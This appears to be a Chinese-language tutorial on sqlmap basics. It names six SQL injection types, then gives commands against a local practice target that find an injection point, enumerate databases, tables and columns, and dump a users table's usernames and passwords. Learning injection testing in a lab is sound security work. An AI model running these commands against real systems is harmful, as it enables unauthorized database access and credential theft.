Sqlmap的基本使用

一,sqlmap支持的六种注入方式

1,基于布尔的盲注

通过返回页面判断条件真假的注入

2,基于时间的盲注

不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加来判断)

3,基于报错注入

页面会返回报错信息,或者直接把注入的语句直接返回在页面中

4,联合查询注入

使用union情况下的注入

5,堆查询注入

可以同时执行多条语句的执行时的注入

6,内联查询注入

在sql语句中执行sql语句

二,sqlmap的基本使用

1,检查是否存在注入点

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1"

Sqlmap的基本使用_第1张图片

2,查看所有数据库

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs

Sqlmap的基本使用_第2张图片 

3,查看当前使用的数据库

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db

Sqlmap的基本使用_第3张图片

4,查看表名

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables 

-D指定数据库,--tables列出表名

Sqlmap的基本使用_第4张图片

 5,列出表中所有字段名

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns

-D指定数据库,-T指定表名,-columns列出所有字段

Sqlmap的基本使用_第5张图片

 6,列出字段内容(数据)

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C username,password --dump

-D指定数据库,-T指定数据表,-C指定要列出的字段,--dump列出字段内容,转存数据

Sqlmap的基本使用_第6张图片 根据提示内容找到转存的数据:

Sqlmap的基本使用_第7张图片

 

 

 

你可能感兴趣的:(sqlmap的使用,sqlmap)